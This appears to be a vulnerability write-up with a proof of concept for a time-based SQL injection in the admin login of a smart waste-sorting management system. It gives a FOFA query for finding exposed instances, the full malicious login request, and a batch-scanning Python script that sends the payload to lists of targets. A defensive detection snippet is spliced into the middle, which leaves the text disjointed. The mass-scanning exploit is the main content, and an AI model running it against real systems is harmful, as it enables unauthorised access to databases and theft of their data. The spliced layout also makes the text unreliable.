Vulnerability overview
The Smart Waste Sorting Management System (智慧垃圾分类管理系统) is used by manufacturers of smart waste bins, kitchen-waste bins and smart litter bins, and is built on AI, facial recognition, mobile internet, big data and IoT technologies. The system contains a SQL injection vulnerability through which an attacker can obtain sensitive information from the database.
FOFA query
title="智能垃圾分类管理系统"
Affected versions
All versions?
Reproduction
Capture the request sent by the login form:
POST /ghc_master/data/action.admindata.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 96
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224
If the response returns 1 after a 5-second delay, the SQL injection vulnerability is present.
Python script for checking targets in batch:
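From the defender's side, the captured request above gives a concrete signature to look for. The following Python is added here and is not part of the original write-up: it inspects form-encoded POST bodies sent to the login action for time-based SQL primitives and a quote-then-comment pattern, and separately flags login responses that take about as long as the SLEEP(5) in the payload. The sample records, the regex list and the 4-second threshold are my own assumptions.

```python
import re
from urllib.parse import parse_qs
# Endpoint and action are from the captured request; the regex list is my own
# (MySQL SLEEP/BENCHMARK, MSSQL WAITFOR DELAY, PostgreSQL pg_sleep).
LOGIN_PATH = "/ghc_master/data/action.admindata.php"
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I)
QUOTE_COMMENT = re.compile(r"'[^']*(--|#|/\*)")  # e.g. admin' ... -- x
SLOW_SECONDS = 4.0  # far above a normal login, just under the 5 s SLEEP

def inspect_login_body(path, body):
    """Return (suspicious, reasons) for a form-encoded POST body to the
    adminlogin action; other paths and actions are left alone."""
    if path != LOGIN_PATH:
        return False, []
    params = parse_qs(body, keep_blank_values=True)
    if params.get("do", [""])[0] != "adminlogin":
        return False, []
    reasons = []
    for name, values in params.items():
        for value in values:
            if TIME_BASED.search(value):
                reasons.append(f"time-based SQL primitive in '{name}'")
            elif QUOTE_COMMENT.search(value):
                reasons.append(f"quote followed by SQL comment in '{name}'")
    return bool(reasons), reasons

def triage(records):
    """Combine body inspection with response time over log-like records
    ({'src', 'path', 'body', 'elapsed'}). A slow adminlogin response is
    reported even when the body looks clean, since an encoded payload can
    slip past the regexes."""
    alerts = []
    for rec in records:
        _, reasons = inspect_login_body(rec["path"], rec["body"])
        if rec["path"] == LOGIN_PATH and rec["elapsed"] >= SLOW_SECONDS:
            reasons.append(f"login response took {rec['elapsed']:.1f}s")
        if reasons:
            alerts.append({"src": rec["src"], "reasons": reasons})
    return alerts

# Constructed sample records: the write-up's payload, a normal login and an
# unrelated request.
SAMPLE_RECORDS = [
    {"src": "203.0.113.5", "path": LOGIN_PATH, "elapsed": 5.1,
     "body": "do=adminlogin&username=admin' AND (SELECT 2847 FROM "
             "(SELECT(SLEEP(5)))trlL)-- sNmL&password=4224"},
    {"src": "198.51.100.9", "path": LOGIN_PATH, "elapsed": 0.2,
     "body": "do=adminlogin&username=admin&password=Passw0rd"},
    {"src": "198.51.100.9", "path": "/index.php", "elapsed": 0.1, "body": ""},
]
```

Calling triage(SAMPLE_RECORDS) yields a single alert for 203.0.113.5 with both the payload match and the slow response as reasons.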
import sys
import argparse
import requests
import urllib3

# Suppress the InsecureRequestWarning that verify=False would otherwise print
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def lemonlove7():
    print('+++FOFA:title="智能垃圾分类管理系统"')
    print('+++python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('+++python xxx.py -f/--file xxx.txt')
    print('+++作者:lemonlove7')
    print('-----------------------------------------------------')


if len(sys.argv) == 1:
    lemonlove7()
    sys.exit()

p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u', '--url', help='目标url', default='')
p.add_argument('-f', '--file', help='文件', default='')
xp = p.parse_args()
url = xp.url
file = xp.file

# Same time-based payload as the captured request above
data = "do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224"
headers = {
    'User-Agent': 'Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/90.0.4430.212Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Cookie': 'PHPSESSID=hfq66id9bum90sovr9gmn7klde'
}

# Single target
if url != '':
    url1 = url
    try:
        url = url + '/ghc_master/data/action.admindata.php'
        r = requests.post(url=url, headers=headers, data=data, timeout=15, verify=False)
        if r.text == '1' and r.status_code == 200:
            print(url1 + '存在sql注入')
        else:
            print(url1 + '不存在sql注入')
    except requests.RequestException:
        print(url1 + "异常")

# List of targets, one per line
if file != '':
    with open(file, 'r') as f:
        for i in f.readlines():
            url = i.strip()
            if not url.startswith(('http:', 'https:')):
                url = 'http://' + url
            url1 = url
            try:
                # Append the login action path to each target before posting
                t = url + '/ghc_master/data/action.admindata.php'
                r = requests.post(url=t, data=data, headers=headers, timeout=15, verify=False)
                if r.status_code == 200 and '1' in r.text:
                    print(url1 + '存在sql注入')
                else:
                    print(url1 + '不存在注入')
            except requests.RequestException:
                print(url1 + '异常')
The output of a run is shown below.
Running sqlmap against the injection point